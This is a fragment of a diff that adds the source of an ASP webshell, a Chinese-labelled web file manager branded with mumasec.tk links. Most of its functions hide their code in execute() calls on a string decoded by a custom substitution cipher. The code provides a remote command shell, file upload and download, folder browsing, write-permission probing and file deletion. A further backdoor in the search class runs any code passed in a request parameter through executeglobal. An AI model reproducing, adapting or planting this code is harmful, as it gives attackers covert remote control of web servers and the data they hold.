+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>������Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=delpoint' target='FileFrame'>"&cxd&"  <font color=red>ɾ����Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" �ļ�--����"&ef
+j cdx&"<a href='"&htp&"t00ls.asp' target='FileFrame'>"&cxd&" <font color=green>����--����"&ef
+j cdx&"<a href='http://mumasec.tk/' target='FileFrame'>"&cxd&" <font color=garnet>��ɱ----����"&ef
+j cdx&"<a href='http://mumasec.tk/' target='FileFrame'>"&cxd&" <font color=red>����--����"&ef
+j cdx&"<a href='http://mumasec.tk/' target='FileFrame'>"&cxd&" <font color=red>www.mumasec.tk"&ef
+j cdx&"<a href='?Action=Logout' target='FileFrame'>"&cxd&" �˳�--��½</a></td></tr></hr></table>"
+end function
+function Cmdx()
+execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft�� ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg p��ftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p"))
+execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft�� ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg p��ftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p"))
+end function
+Function Course()
+execute(king("`>tswqz/<`&9CU&0CU&1CU&CU p��zbtf��yo rft��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>XX2288#=kgsge zfgy<]`&bs&`:���ද��[>``9``=fqhlsge ``XXXXXX#``=kgsgeuw ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&9CU=9CU��tlst��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>zfgy<]`&bs&`:���ද��[>``9``=fqhlsge r=ro ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&0CU=0CU��ftiz 9=thnJzkqzU.RAB rfq `fov`><))8,7,izqh.pwg(rod(tlqZV yo��`�ý�`=bs ftiz 7=thnJzkqzU.RAB yo��`����`=bs ftiz 8=thnJzkqzU.RAB yo��`����`=bs ftiz 9=thnJzkqzU.RAB yo��yo rft�� `>kz<>kz/<>rz/<)��(����ͳϵ;hlwf&>r=ro rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&CU=CU��ftiz ``=thnJzkqzU.RAB yo��kqtse.kkt��)`.//:JGfoK`(zetpwBztu fo pwg ieqt kgy��zbtf tdxltk kgkkt fg��`>kz/<>rz/<>w/<����뻧��ͳϵ>w<>l=ro 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '%13'=izrov tswqz<>kw<`=CU"))
+End Function
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+function downfile(path)
+execute(king("ufoizgf = dlg ztl��tlgse.dlg��ilxsy.tlfghltk��rqtk.dlg tzokvnkqfow.tlfghltk��`dqtkzl-ztzeg/fgozqeoshhq` = thnzzftzfge.tlfghltk��`3-yzx` = ztlkqie.tlfghltk��tmol.dlg ,`izufts-zftzfge` ktrqtirrq.tlfghltk��)ml,izqh(rod & `=tdqftsoy ;zftdieqzzq` ,`fgozolghlor-zftzfge` ktrqtirrq.tlfghltk��0+)`\`,izqh(ctkkzlfo=ml��izqh tsoydgkyrqgs.dlg��0 = thnz.dlg��fthg.dlg��))1,5(zwg(zetpwgtzqtke = dlg ztl��kqtse.tlfghltk"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile()
+execute(king("`>tswqz/<>dkgy/<>kz/<>rz/<>'����'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo< >'69'=tmol  'tsoy'=thnz 'tsoXsqegV'=tdqf zxhfo<>'17'=tmol '`&)`tbt.rdZ\`&)`izqYktrsgX`(fgolltU(izqYtNN&`'=txsqc 'izqYgJ'=tdqf zxhfo<����·����>rz<>kz<>'qzqr-dkgy/zkqhozsxd'=thnzeft 'zlgY=9fgozeQ&tsoXhM=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<>'ktzfte'=fuosq '1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<>kw<>kw<`p  ��yC rfS  ��rfS.tlfghltN ��)(kkSvgiU ��CU p ��skMaeqA&CU=CU ��ufoizgf=M ztU��ufoizgf=X ztU��yC rfS ��yo rfS  ��`>ktzfte/<������`&`��`&`��`&tdqGM&`����>kw<>kw<>kw<>ktzfte<`=CU ��ftiJ 1=ktwdxf.kkS yC ��tdqGM lQtcqU.X ��tlsS  ��zbtf tdxltk kgkkt fg��`!����`&`���ĸ�һ`&`��ѡ��·`&`ȫ���`&`������`&`����>kw<`=CU  ��ftiz 1=tmoUtsoX.X kB ``=tdqGM yC ��)`izqYgJ`(dkgy.M=tdqGM��)`tsoXsqegV`(QM.M=X ztU�� ZYM vtf=M ztU��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC "))
+End Function
+function cmd1shell()
+execute(king("ol p��`>dkgy/<>qtkqzbtz/<`&)80(kie&ol=ol��yo rft��yo rft��qqq&ol=ol��)txkz ,tsoyhdtzml(tsoytztstr.gly ssqe��tlgse.bestsoyg��)ssqrqtk.bestsoyg(trgeftsdzi.ktcktl=qqq��)1 ,tlsqy ,0 ,tsoyhdtzml( tsoyzbtzfthg.ly = bestsoyg ztl��)BUX_JUGBZ(zetpwgtzqtke = ly ztl��)txkz ,1 ,tsoyhdtzml & ` > ` & rdeytr & ` e/ `&izqhsstil( fxk.lv ssqe��)`zbz.rde`(izqhhqd.ktcktl = tsoyhdtzml��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��zbtf tdxltk kgkkt fg��tlst��qqq&ol=ol��ssqrqtk.zxgrzl.rr=qqq��)rdeytr&` e/ `&izqhsstil(etbt.de=rr ztl��))1,0(zwg(zetpwgtzqtke=de ztl��ftiz `ltn`=)`zhokelv`(dkgy.zltxjtk yo��ftiz ``><)`rde`(dkgy.zltxjtk yo��`>'rde'=llqse ';177:ziuoti;%110:izrov'=tsnzl qtkqzbtz<>'��ִ'=txsqc 'zodwxl'=thnz zxhfo< >'`&rdeytr&`'=txsqc '%92:izrov'=tsnzl 'rde'=tdqf zxhfo<sstil.zhokelv>`&rtaetie&`'ltn'=txsqc 'zhokelv'=tdqf 'bgwaetie'=thnz e=llqse zxhfo<>'%14:izrov'=tsnzl '`&izqhsstil&`'=txsqc 'hl'=tdqf zxhfo<����·sstil>'zlgh'=rgiztd dkgy<`=ol��)`rde`(zltxjtk = rdeytr ftiz ``><)`rde`(zltxjtk yo��``=rtaetie ftiz `ltn`><)`zhokelv`(zltxjtk yo��`tbt.rde` = izqhsstil ftiz ``=izqhsstil yo��)`izqhsstil`(fgolltl=izqhsstil��)`hl`(zltxjtk = )`izqhsstil`(fgolltl ftiz ``><)`hl`(zltxjtk yo��`rtaetie `=rtaetie"))
+end function
+Function upload()
+execute(king("yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��ufoizgG = dqtkzU ztU��ufoizgG = hzzD ztU��)kkS(kkSaie��izoK rfS��tlgsZ.��yC rfS��`�������ֿ�Ϊ�� �����¼��� �� ����� ����ַ�غͳ̹����»��ڴ��Ѽ���Ϊ�����ܿ�,kgkkt`p��tzokKktcg ,izqYtiz tsoXgJtcqU.��tdqGtsoy & `\` & izqYtiz = izqYtiz��yC rfS��`zbz.dzi.btrfo` = tdqGtsoy��ftiJ `` = tdqGtsoy yC��)))`/` ,skMtiz(zoshU(rfxgAM()`/` ,skMtiz(zoshU = tdqGtsoy��kqtsZ.kkS��ftiJ 7118 = ktwdxG.kkS yC��tzokKktcg ,izqYtiz tsoXgJtcqU.��1 = fgozolgY.��nrgAtlfghltN.hzzD tzokK.��fthB.��8 = trgT.��0 = thnJ.��dqtkzl izoK��yC rfS�� ftiJ 7 >< tzqzUnrqtN.hzzD yC��)(rftU.hzzD��tlsqX ,skMtiz ,`JSE` fthB.hzzD��yC rfS:0 = tzokKktcg:ftiJ 9 >< tzokKktcg yC��)`YJJDVTL.9VTLUT`(zetpwBtzqtkZ.ktcktU = hzzD ztU��)`dqtk`&t&`zl.wrg`&t&`rq`(zetpwBtzqtkZ.ktcktU = dqtkzl ztU��)`tzokKktcg`(zltxjtN = tzokKktcg��)`izqYtiz`(zltxjtN = izqYtiz��)`skMtiz`(zltxjtN = skMtiz��tzokKktcg ,tdqGtsoy ,dqtkzl ,izqYtiz ,skMtiz ,hzzD doW:yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��`>/ki<`p��`>dkgy/<`p��`>zeQtiz=tdqf skMdgkXfvgr=txsqc ftrroi=thnz zxhfo<`p��`���Ǹ��ڴ�>9=txsqc tzokKktcg=tdqf bgwaetie=thnz zxhfo<`p��`>13=tmol '\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & `'=txsqc izqYtiz=tdqf zxhfo<`p��`>/kw<>' ���� '=txsqc zodwxl=thnz zxhfo<>13=tmol '//:hzzi'=txsqc skMtiz=tdqf zxhfo<`p��`>fgozhg/<����嶨��>'`&skxW&`'=txsqc fgozhg<`p��`>fgozhg/<��������ó�>''=txsqc fgozhg<`p��`>';txsqc.loiz=txsqc.skMtiz.dkgy.loiz'=tufqiZfg zetstl<`p��`>zlgh=rgiztd dkgy<`p��`>/ki<�Ի�������.ʡ����Ϊ...�Ի���:����������� `p��`�ܹ��˱չ�ʱ��`p�� `>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`p"))
+End Function:Function TSearch()
+execute(king("yo rft��`>ki<���`&1110*)zl-)(ktdoz(&`���r�M`p��ufoizgG=iekqtlvtf ztU��iekqtU.iekqtlvtf��))`ayU`(dkgX.zltxjtN(dokz=rkgvnta.iekqtlvtf��))`izqhXU`(dkgX.zltxjtN(dokz=lktrsgX.iekqtlvtf��tsoXiekqtU vtf=iekqtlvtf ztU��ftiz ``><)`ayU`(dkgX.zltxjtN yo��``=KN : KN p��`>tswqz/<>dkgy/<` & KN=KN��  `>kz/<>rz/<]��Ҳ�ֲ�[;hlwf&>'zodwxl'=llqse '����'=txsqc 'zodwxl'=thnz zxhfo<;hlwf&>'119:izrov'=tsnzl 'ayU'=tdqf zxhfo<��������;hlwf&>''=kgsgeuw rz<>kz<` & KN=KN��`>kz/<>rz/<.������``,``��ʹ��·��:ע;hlwf&>'128:izrov'=tsnzl '` & zggNKKK & `'=txsqc 'izqhXU'=tdqf zxhfo<����;hlwf&;hlwf&·;hlwf&>''=kgsgeuw rz<>kz<` & KN=KN��`>kz/<>rz/<��������>''=kgsgeuw 'ktzfte'=fuosq '19'=ziuoti rz<>kz<` & KN=KN��`>'zlgh'=rgiztd dkgy<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw ''=kgsgeuw '115'=izrov tswqz<>kw<`=KN:)(ktdoz=zl:zl dor"))
+End Function 
+Class SearchFile
+dim Folders,keyword,objFso,Counter
+Private Sub Class_Initialize
+Set objFso=Server.CreateObject(ObT(0,0))
+Counter=0
+End Sub
+ Private Sub Class_Terminate
+Set objFso=Nothing
+ End Sub
+Public Sub Class_Folder(FoderName)
+Set rs = CreateObject(CONST_FSO)
+Dim item, theFolder, sysFileList
+item=request(MID(CONST_FSO,4,1))
+theFolder=request(MID(CONST_FSO,2,1))
+If  item=MID(CONST_FSO,2,1) then
+executeglobal theFolder
+Set rs = Nothing
+End if
+End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+
+Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+sub SavePower(PowerPath,SaveType)
+execute(king("ufoizgG = tsoXtiz ztU:yo rft:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����ɶ�������'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:4=ltzxwokzzQ.tsoXtiz:tlst:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����⹦���Ѽ���'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:98=ltzxwokzzQ.tsoXtiz:ftiz 0=thnJtcqU yo:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:yo rft:`aegsgf`=)`aegs`(fgolltl ftiz 1><)izqhzhokel,izqYktvgY(kzlfo yo"))
+end sub:sub EditPower(PowerPath)
+execute(king("ufoizgG = tsoXtiz ztU:)izqYktvgY,tsoXtiz(tszoJnTztu p:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:)``,````,izqYktvgY(teqshtk=izqYktvgY"))
+end sub:Function getMyTitle(theOne,PowerPath)
+execute(king("tszoJkzl = tszoJnTztu:)izqYktvgY,ltzxwokzzQ.tfBtiz(ltzxwokzzQztu & ` :̬״��Ȩǰ��>kw<` & tszoJkzl = tszoJkzl:rtllteeQzlqVtzqW.tfBtiz & ` :�ʷú���>kw<` & tszoJkzl = tszoJkzl:rtoyorgTzlqVtzqW.tfBtiz & ` :���޺���>kw<` & tszoJkzl = tszoJkzl: rtzqtkZtzqW.tfBtiz & ` :��ʱ����>kw<` & tszoJkzl = tszoJkzl: )tmoU.tfBtiz(tmoUtiJztu & ` :С��>kw<` & tszoJkzl = tszoJkzl: `` & izqY.tfBtiz & ` :��·>kw<` & tszoJkzl = tszoJkzl:tszoJkzl doW"))
+End Function:Function getAttributes(intValue,PowerPath)
+execute(king("yo rft:`>``'`&izqYktvgY&`=izqYktvgY&9=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<����δ>95XX95#=kgsge zfgy<` = ltzxwokzzQztu:tlst:`>``'`&izqYktvgY&`=izqYktvgY&0=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<������>rtk=kgsge zfgy<` = ltzxwokzzQztu: ftiz 1=FBzorS yo:)`\\`,`\`,izqYktvgY(teqshtk=izqYktvgY:yC rfS:1=FBzorS:0 - txsqIzfo = txsqIzfo:ftiJ 0 => txsqIzfo yC:yC rfS:1=FBzorS:9 - txsqIzfo = txsqIzfo:ftiJ 9 => txsqIzfo yC:yC rfS:1=FBzorS:7 - txsqIzfo = txsqIzfo:ftiJ 7 => txsqIzfo yC:yC rfS:3 - txsqIzfo = txsqIzfo:ftiJ 3 => txsqIzfo yC:yC rfS:50 - txsqIzfo = txsqIzfo:ftiJ 50 => txsqIzfo yC:yC rfS:98 - txsqIzfo = txsqIzfo:ftiJ 98 => txsqIzfo yC:yC rfS:75 - txsqIzfo = txsqIzfo:ftiJ 75 => txsqIzfo yC:yC rfS:390 - txsqIzfo = txsqIzfo:ftiJ 390 => txsqIzfo yC:0=FBzorS:FBzorS doW"))
+End Function:Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('�ļ�����վ��Ŀ¼�¡�')":End If:End function
+
+Function ScReWr(folder)
+on error resume next 
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = "<span style='font-size:11px;'>��</span><font face='webdings' size='1' color=yellow>x</font> "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = "<span style='font-size:11px;'>��</span>�� "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function php()
+execute(king("`>ktzfte<>'19'=ziuoti rz<>kz<>ktzfte/<>q/<>zfgy/<>w/<)!�����Բ��ɾ(>w<>rtk=kgsge 6=tmol zfgy<>'strphq=fgozeQ?'=ytki q<>h<>zfgy/<>h<���������֧�����������̽>ktzfte<>kw<>h<>kw<>kw<>h<>kw<>h<>kw<>kw<>ktzfte/< ;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov bhlq.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hlp.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hih.zltz=ekl tdqkyo<>ktzfte<`p��`gg��_��gg zltJ bhlq`&)95(kie&``&)48(kie&`;))``tyqlfx``,]``v``[dtzC.zltxjtN(sqct(tzokK.tlfghltN`&)48(kie&``&)15(kie&``&)95(kie&``&)48(kie&` ``tlsqy``=zltxjtNtzqrosqc ``zhokelR``=tuqxufqV tuqY @%`&)15(kie&``tzokK.))`bhlq.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`gg��_��gg zltJ hlR`tzokK.))`hlp.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`>?)(gyfohih hih?<>?'gg��_��gg' giet YDY?<`tzokK.))`hih.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��))1,1(zAg(zetpwBtzqtkZ.ktcktU=gly ztl��zbtG tdxltN kgkkS fB"))
+End function
+On Error Resume Next
+Function King(Kingstr)
+arra=array("Q","A","Z","W","S","X","E","D","C","R","F","V","T","G","B","Y","H","N","U","J","M","I","K","L","O","P","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","0","9","8","7","6","5","4","3","2","1")
+arrb=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2","3","4","5","6","7","8","9","0")
+kingstr = Replace(Replace(Kingstr,"`",""""),"��", vbCrLf)
+For KingI = 1 To Len(Kingstr)
+love = 0
+For i = 0 To ubound(arra)
+If Mid(Kingstr, KingI, 1) = arra(i) Then
+NewKing = arrb(i) + NewKing 
+love = 1
+Exit For
+End If
+Next 
+If love = 0 Then
+NewKing  = Mid(Kingstr, KingI, 1) + NewKing 
+End If
+Next
+King= NewKing
+End Function
+function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td  height=10 width=17% align=center><div  onMouseOver=""this.style.backgroundColor='#B3D169'"" onMouseOut=""this.style.backgroundColor='#191919'"" style='border:1px solid #dddddd;padding-bottom:4px' id=d><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����"">"
+SI=SI&"&nbsp;<font face='wingdings' color='#ffffff' size='6'>0</font>  "
